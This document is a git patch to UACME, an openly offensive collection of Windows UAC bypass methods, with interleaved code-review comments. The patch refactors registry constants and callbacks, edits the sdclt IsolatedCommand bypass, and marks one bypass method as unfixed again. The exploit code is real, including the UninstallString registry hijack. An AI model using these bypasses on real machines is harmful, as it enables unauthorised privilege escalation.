From d033e6cd41b0b8b267468fa8f5a1f17094b37cd3 Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Sun, 5 Aug 2018 12:26:27 +0700 Subject: [PATCH] v 2.9.0 Internal rearrange. Marking 42 as unfixed again as it produces mixed results on different Windows 10 builds. --- README.md | 4 ++-- Source/Akagi/Resource.rc | Bin 6144 -> 6144 bytes Source/Akagi/consts.h | 4 ++++ Source/Akagi/methods/comet.c | 6 +++--- Source/Akagi/methods/enigma0x3.c | 27 ++++++++++++------------ Source/Akagi/methods/explife.c | 8 +++---- Source/Akagi/methods/methods.c | 35 ++++++++++++++++++++++++------- Source/Akagi/methods/methods.h | 2 +- Source/Akagi/uacme.vcxproj.user | 12 +++++------ UACME.sha256 | 16 +++++++------- 10 files changed, 70 insertions(+), 44 deletions(-) diff --git a/README.md b/README.md index 383150c..77f745a 100644 --- a/README.md +++ b/README.md @@ -393,8 +393,8 @@ Keys (watch debug output with dbgview or similar for more info): * Component(s): Attacker defined * Implementation: ucmFwCplLuaMethod * Works from: Windows 7 (7600) - * Fixed in: Windows 10 RS4 (17134) - * How: Shell API update + * Fixed in: unfixed :see_no_evil: + * How: - 43. Author: Oddvar Moe derivative * Type: Elevated COM interface * Method: IColorDataProxy, ICMLuaUtil diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc index c1771907857575d0e54f201d1d9af73fbdf6d834..e054504b6ea78521f17fa3f44a3226b0f77ccc8b 100644 GIT binary patch delta 38 rcmZoLXfW6y!pCSaS(MM5(PFbN-&-aiXQH6)<_y6bj6e}b;r%QC)Kd#G delta 38 rcmZoLXfW6y!pCSnS(MM5(R{Nn-&-aiXQH6)<_y6bj6e}b;r%QC)CLPK diff --git a/Source/Akagi/consts.h b/Source/Akagi/consts.h index 18de97a..28c2778 100644 --- a/Source/Akagi/consts.h +++ b/Source/Akagi/consts.h 
@@ -34,6 +34,8 @@ #define T_APP_PATH L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\" #define T_DISPLAY_CALIBRATION L"Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration" #define T_DOTNET_CLIENT L"Software\\Microsoft\\Windows NT\\CurrentVersion\\KnownFunctionTableDlls" +#define T_UNINSTALL L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\" + #define T_MSC_SHELL L"Software\\Classes\\mscfile" #define T_EXEFILE_SHELL L"Software\\Classes\\exefile" #define T_MSSETTINGS L"Software\\Classes\\ms-settings" @@ -52,6 +54,8 @@ #define T_ISOLATEDCOMMAND L"IsolatedCommand" #define T_DELEGATEEXECUTE L"DelegateExecute" +#define T_UNINSTALL_STRING L"UninstallString" + #define BINARYPATH_TAG L"binarypatch01" #define MSFT_FULL L"Microsoft Corporation" diff --git a/Source/Akagi/methods/comet.c b/Source/Akagi/methods/comet.c index 13f9aa3..2e9ec3e 100644 --- a/Source/Akagi/methods/comet.c +++ b/Source/Akagi/methods/comet.c @@ -4,9 +4,9 @@ * * TITLE: COMET.C * -* VERSION: 2.87 +* VERSION: 2.90 * -* DATE: 19 Jan 2018 +* DATE: 16 July 2018 * * Comet method (c) BreakingMalware * For description please visit original URL @@ -123,7 +123,7 @@ BOOL ucmCometMethod( persistFile->lpVtbl->Release(persistFile); _strcpy(szCombinedPath, g_ctx.szTempDirectory); - _strcat(szCombinedPath, L"huy32"); + _strcat(szCombinedPath, SOMEOTHERNAME); _strcpy(szLinkFile, szCombinedPath); _strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET); diff --git a/Source/Akagi/methods/enigma0x3.c b/Source/Akagi/methods/enigma0x3.c index 32d7bd8..9c4846f 100644 --- a/Source/Akagi/methods/enigma0x3.c +++ b/Source/Akagi/methods/enigma0x3.c @@ -4,9 +4,9 @@ * * TITLE: ENIGMA0X3.C * -* VERSION: 2.89 +* VERSION: 2.90 * -* DATE: 14 Jun 2018 +* DATE: 16 July 2018 * * Enigma0x3 autoelevation methods and everything based on the same * ShellExecute related registry manipulations idea. 
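Review bot: `SOMEOTHERNAME` on the new `_strcat(szCombinedPath, SOMEOTHERNAME);` line is not defined anywhere in this patch — the consts.h hunks add only `T_UNINSTALL` and `T_UNINSTALL_STRING` — so it is presumably an existing macro in an included header; worth confirming it expands to a wide-string literal like the `L"huy32"` it replaces, since `_strcat` takes no length. ucmCometMethod begins and ends outside the hunk.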
@@ -478,22 +478,23 @@ BOOL ucmSdcltIsolatedCommandMethod( // There is a fix of original concept in 16237 RS3. // Bypass it. // - if (g_ctx.dwBuildNumber >= 16237) + if (g_ctx.dwBuildNumber >= 16237) { lpTargetValue = TEXT(""); + } else { lpTargetValue = T_ISOLATEDCOMMAND; - - // - // Save old value if exist. - // - cbOldData = MAX_PATH * 2; - RtlSecureZeroMemory(&szOldValue, sizeof(szOldValue)); - lResult = RegQueryValueEx(hKey, lpTargetValue, 0, NULL, - (BYTE*)szOldValue, &cbOldData); - if (lResult == ERROR_SUCCESS) - bExist = TRUE; } + // + // Save old value if exist. + // + cbOldData = MAX_PATH * 2; + RtlSecureZeroMemory(&szOldValue, sizeof(szOldValue)); + lResult = RegQueryValueEx(hKey, lpTargetValue, 0, NULL, + (BYTE*)szOldValue, &cbOldData); + if (lResult == ERROR_SUCCESS) + bExist = TRUE; + cbData = (DWORD)((1 + sz) * sizeof(WCHAR)); lResult = RegSetValueEx( diff --git a/Source/Akagi/methods/explife.c b/Source/Akagi/methods/explife.c index a6692e5..d29110b 100644 --- a/Source/Akagi/methods/explife.c +++ b/Source/Akagi/methods/explife.c @@ -4,9 +4,9 @@ * * TITLE: EXPLIFE.C * -* VERSION: 2.87 +* VERSION: 2.90 * -* DATE: 19 Jan 2018 +* DATE: 19 July 2018 * * ExpLife UAC bypass using IARPUninstallStringLauncher. * For description please visit original URL @@ -104,7 +104,7 @@ BOOL ucmUninstallLauncherMethod( if (CoCreateGuid(&guid) != S_OK) break; - _strcpy(szKeyName, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\")); + _strcpy(szKeyName, T_UNINSTALL); if (StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR))) { _strcat(szKeyName, szGuid); @@ -115,7 +115,7 @@ BOOL ucmUninstallLauncherMethod( break; cbData = (1 + _strlen(lpszExecutable)) * sizeof(WCHAR); - lResult = RegSetValueEx(hKey, TEXT("UninstallString"), 0, REG_SZ, (BYTE*)lpszExecutable, + lResult = RegSetValueEx(hKey, T_UNINSTALL_STRING, 0, REG_SZ, (BYTE*)lpszExecutable, (DWORD)cbData); if (lResult != ERROR_SUCCESS) 
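Review bot: `cbOldData = MAX_PATH * 2;` hard-codes the size of `szOldValue` while the very next line already derives it with `sizeof(szOldValue)`; the two will drift if the array is ever resized, so `cbOldData = (DWORD)sizeof(szOldValue);` keeps the byte count passed to RegQueryValueEx tied to the declaration. Only `ERROR_SUCCESS` sets `bExist`, so a stored value larger than the buffer (`ERROR_MORE_DATA`) is treated as absent; whether that is intended depends on the restore path, which lies outside this hunk. ucmSdcltIsolatedCommandMethod begins and ends outside the hunk.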
diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c index 867ab17..62de12b 100644 --- a/Source/Akagi/methods/methods.c +++ b/Source/Akagi/methods/methods.c @@ -6,7 +6,7 @@ * * VERSION: 2.90 * -* DATE: 10 July 2018 +* DATE: 01 Aug 2018 * * UAC bypass dispatch. * @@ -68,7 +68,7 @@ UCM_API(MethodSPPLUAObject); ULONG CALLBACK IsMethodNeedRemediation( PVOID Parameter); -UCM_EXTRA_CONTEXT g_ucmWDCallback = { IsMethodNeedRemediation, NULL }; +UCM_EXTRA_CONTEXT g_ucmWDCallback; UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { { MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, @@ -113,7 +113,7 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { { MethodCorProfiler, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodCOMHandlers, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodCMLuaUtil, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, - { MethodFwCplLua, &g_ucmWDCallback, { 7600, 17134 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, + { MethodFwCplLua, &g_ucmWDCallback, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, { MethodDccwCOM, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, { MethodVolatileEnv, NULL, { 7600, 16229 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodSluiHijack, &g_ucmWDCallback, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, @@ -122,6 +122,26 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { { MethodSPPLUAObject, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE } }; +/* +* SetupExtraContextCalbacks +* +* Purpose: +* +* Configure extra context callbacks. +* +*/ +VOID SetupExtraContextCalbacks( + VOID +) +{ + g_ucmWDCallback.Parameter = (PVOID)g_ctx.IsWow64; + g_ucmWDCallback.Routine = IsMethodNeedRemediation; + + // + // Reserved for future use. + // +} + /* * IsMethodNeedRemediation * 
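Review bot: The new function name `SetupExtraContextCalbacks` is misspelled, and the definition is not `static` although nothing shown declares it outside this file; `static VOID SetupExtraContextCallbacks(VOID)` with the matching call in MethodsManagerCall (the @@ -266 hunk) would fix both. Its header comment should state that it must run before any dispatch-table routine dereferences its ExtraContext, because the @@ -68 hunk drops the static initializer of `g_ucmWDCallback`, so `Routine` and `Parameter` stay zero until this function has run. The `// Reserved for future use.` comment at the end of the body documents nothing and is better removed or replaced by what is actually reserved.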
@@ -266,6 +286,8 @@ BOOL MethodsManagerCall( } } + SetupExtraContextCalbacks(); + bResult = Entry->Routine(Method, Entry->ExtraContext, PayloadCode, PayloadSize); if (PayloadCode) { @@ -938,7 +960,7 @@ UCM_API(MethodFwCplLua) if (g_ctx.dwBuildNumber >= 9600) { if (ExtraContext) { if (ExtraContext->Routine) { - if (ExtraContext->Routine((PVOID)g_ctx.IsWow64) != STATUS_NO_SECRETS) + if (ExtraContext->Routine(ExtraContext->Parameter) != STATUS_NO_SECRETS) g_ctx.MethodExecuteType = ucmExTypeRemediationRequired; } } @@ -993,14 +1015,13 @@ UCM_API(MethodSluiHijack) LPWSTR lpszPayload = NULL; UNREFERENCED_PARAMETER(Method); - UNREFERENCED_PARAMETER(ExtraContext); UNREFERENCED_PARAMETER(PayloadCode); UNREFERENCED_PARAMETER(PayloadSize); if (g_ctx.dwBuildNumber >= 9600) { if (ExtraContext) { if (ExtraContext->Routine) { - if (ExtraContext->Routine((PVOID)g_ctx.IsWow64) != STATUS_NO_SECRETS) + if (ExtraContext->Routine(ExtraContext->Parameter) != STATUS_NO_SECRETS) g_ctx.MethodExecuteType = ucmExTypeRemediationRequired; } } @@ -1063,4 +1084,4 @@ UCM_API(MethodSPPLUAObject) return ucmSPPLUAObjectMethod(PayloadCode, PayloadSize); } -#pragma warning(pop) \ No newline at end of file +#pragma warning(pop) diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h index 2dd01b0..0f5f1b4 100644 --- a/Source/Akagi/methods/methods.h +++ b/Source/Akagi/methods/methods.h @@ -6,7 +6,7 @@ * * VERSION: 2.90 * -* DATE: 10 July 2018 +* DATE: 01 Aug 2018 * * Prototypes and definitions for UAC bypass methods table. * diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user index 9bd6ef8..4008859 100644 --- a/Source/Akagi/uacme.vcxproj.user +++ b/Source/Akagi/uacme.vcxproj.user @@ -1,27 +1,27 @@  - 0 + 42 WindowsLocalDebugger - 0 + 42 WindowsLocalDebugger - 0 + 42 WindowsLocalDebugger - 0 + 42 WindowsLocalDebugger - 0 + 42 WindowsLocalDebugger - 0 + 42 WindowsLocalDebugger \ No newline at end of file 
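Review bot: The remediation check is now byte-identical in MethodFwCplLua and MethodSluiHijack (the @@ -938 and @@ -993 hunks); a single file-local helper taking the ExtraContext pointer would keep the two in step, and the three nested ifs collapse to one `if (ExtraContext && ExtraContext->Routine && ExtraContext->Routine(ExtraContext->Parameter) != STATUS_NO_SECRETS)`. Both also rely on `SetupExtraContextCalbacks();` in this hunk having filled `Parameter` immediately before `Entry->Routine` is invoked; a one-line comment at that call saying so would help the next reader. MethodsManagerCall, MethodFwCplLua and MethodSluiHijack all begin and end outside their hunks.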
diff --git a/UACME.sha256 b/UACME.sha256
index f68ed70..ccd9f28 100644
--- a/UACME.sha256
+++ b/UACME.sha256
@@ -12,20 +12,20 @@ a0a07303b0cf4591542c18436aa579d0ed91f880fcdf01e2796b5bf03dc311d0 *Source\Akagi\b 5eafc42613cbf70c4ee53f0511befc8a0ddd212f83387877a9883d05036f493c *Source\Akagi\bin64res.rc c401577184f2f57d56fea4c03e0cc1c18a7785bf8b251ca658ade5685a9848c3 *Source\Akagi\compress.c 9f93bbb4c77349179641415ec9a4367a6f77dc28b093d3d11231f6abf8c3cd78 *Source\Akagi\compress.h -f98bea095c00078ae9be90e276ff36cceeaecd8f3c3bc79a8ba0db3e72d92aeb *Source\Akagi\consts.h +2941a15a2787f4e2d5fafa8cde6db6d898135951df5bbe1059ff3cf87f4e18d3 *Source\Akagi\consts.h 44bd12f1712f8390bda2ecd6fb4e763c320239ac25e31f426bd91656647bf38d *Source\Akagi\global.h 4e740d5caffc8068a07e6ca862ed85de1de383e45cf31013c9e36efdf6a8b111 *Source\Akagi\main.c a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\makecab.c bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h -49b33e6032f42dde93e7b03efb17290eaf65c4fab95b5753fbf335722916cb52 *Source\Akagi\Resource.rc +0de1eadbf92af6616dc03fbf8a0800166f42613f0a31680f940c3aa309587ba2 *Source\Akagi\Resource.rc b002efa2d4bebd83b8fad8b6d2ec525de57919796bffa0577ab49a7a179cba7f *Source\Akagi\sup.c 3479b565d7a469087825838cd724eb58187e4df92ff86e2f65dde746fca8ec17 *Source\Akagi\sup.h a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress a7d382431eb421142fcc28156364f60e807ca4818b350a6b6b614ab6542e9074 *Source\Akagi\uacme.vcxproj 92069b7b38ee6ce5c2e8a9189c078f2ccd251fab0514d362d5f0a13e95d08aeb *Source\Akagi\uacme.vcxproj.filters -cc2dfcc6ea3c2c3f81ba00d43c104466b4c6b3208563a7fd3707131160bbd1f4 *Source\Akagi\uacme.vcxproj.user +cd9b79b5e8e8a9c2a7a8afcf49d685f50368fb20ad2d4c133eb835e133ad82d5 *Source\Akagi\uacme.vcxproj.user 425b613c924b247fbd40967f4d25c432edddef1c1599cb5cb5c50f5cf0490b6e 
*Source\Akagi\bin\Akatsuki64.cd 1a2e3df7ad3adc7e4c381e5dc2169e759567bd5c3801b38cc50180c81aad8756 *Source\Akagi\bin\Fubuki32.cd 579e447729ba32e0d5d69146acbc048e3aaa8c9f404c0ae481f44d494ff77bae *Source\Akagi\bin\Fubuki64.cd 
@@ -49,15 +49,15 @@ fbab853743692f7d3fa52343e85518aa9fdc462b389c9847e5f8628efb7432d3 *Source\Akagi\m 86471743844fedc7910c20b259c55504c4f28dad9df7c8f95a67fa626727ecbf *Source\Akagi\methods\carberp.c 16253a3986916f936630970a044d62d20dcce961ed074c988013ee17669b9906 *Source\Akagi\methods\carberp.h c62f98b79c86e4fa6b90f8af480f18bc21e2dc90af268ce6ba6e343789ac3856 *Source\Akagi\methods\cdproxy.h -020c20e6c225f4fde1b7df23c9d56ffe903a9f45936814984d8a72b1b7b82cc1 *Source\Akagi\methods\comet.c +ade9abba42c00fa2f7427a88ca8035180dfd62acabb1831ee68584af2486653e *Source\Akagi\methods\comet.c 7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h 5dbbf2af06f6bf545ab7c889fe7a6cf0653036c545aa29b8dc77086ee3304e10 *Source\Akagi\methods\comfileop.c 7c1e67ec03370d4e97fc5947a832090bf8283641c19f7cad1cb8f3d93385bac2 *Source\Akagi\methods\comfileop.h be2ceae57389dcaf814cd5e1fc1c137979b71671eca44a4db445fa2824591691 *Source\Akagi\methods\deroko.c 51d35d30ca8bc6a72202fa26aa6f2cb648036d62635cb52d52ee2d6bbc07da2b *Source\Akagi\methods\deroko.h -e681867973300526880dd883b71c56de360c4a5c6dbb2ff2e8b43ee3d9cc2469 *Source\Akagi\methods\enigma0x3.c +ec11c2f469f7e7f76893e23d7e275f55930f80fd8a080078cfcd86532888e52a *Source\Akagi\methods\enigma0x3.c 5c791f3bcdd23a2eabad1afd7205896bc09848d4c62b1efc2c5a777b2b5aabc8 *Source\Akagi\methods\enigma0x3.h -8c6acdf8a3a6a2ca5c07cc947ed098c4d6bc8b951558c5f9670048c248748b70 *Source\Akagi\methods\explife.c +c81f288adea7caf27d98ba81d7a1350376b72ecdab01edf89b697d77dda4c02e *Source\Akagi\methods\explife.c 1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h 3827958bc16dcec779fa5751f1d368370285eb2bddfa30ff803478ee1c2cabf2 *Source\Akagi\methods\fwcpllua.h 8430eaf9d06136a6a7e015ccefac85b29476e56024f98a36db5947f8e0fa648e *Source\Akagi\methods\gootkit.c 
@@ -66,8 +66,8 @@ e681867973300526880dd883b71c56de360c4a5c6dbb2ff2e8b43ee3d9cc2469 *Source\Akagi\m fb16843d3353e3499d902bdbad39a82e045406f4e4a98da4cbcad2cc28d0cce3 *Source\Akagi\methods\hakril.h 6194cd6305dadcfbedbb9d68a6f48ecf029e3b2fc03c313009aed7e2cf57edf3 *Source\Akagi\methods\hybrids.c 584dbe0e06fbe88a15f358b2f9d9b5b230deb63d4b8c7469db4f6085be2064d6 *Source\Akagi\methods\hybrids.h -bcd5ff3516346a3a73ab224caf5fb8656e82086bb4759d7260af2c4555c9c4e0 *Source\Akagi\methods\methods.c -a7ddc62ad4a87b9edd8069ccf6c84bc018d6b54fa8c3f6917a9d43279219f36b *Source\Akagi\methods\methods.h +bb0f1b7465ff6c0686d4458d6c4e22f45296eae04e46c49316b5cf8b02b4512d *Source\Akagi\methods\methods.c +80f45429311e0d30b2bc714a15f17bdad5d40295b13c33271a4fc6e9c5669f15 *Source\Akagi\methods\methods.h 58f7b319b79172a6eb4c563db0a40320d4d6d68d02fb3b164c7875c413bd6184 *Source\Akagi\methods\pitou.c cc1a0a414b6f1bc6b1301fd5119371811fbd6cb99b884356df71d960a8933cc8 *Source\Akagi\methods\pitou.h 6fd555cf1bd17921e5b4f7aaefb4cc3dca2483159da3e24703c8412e36bb8354 *Source\Akagi\methods\sandworm.c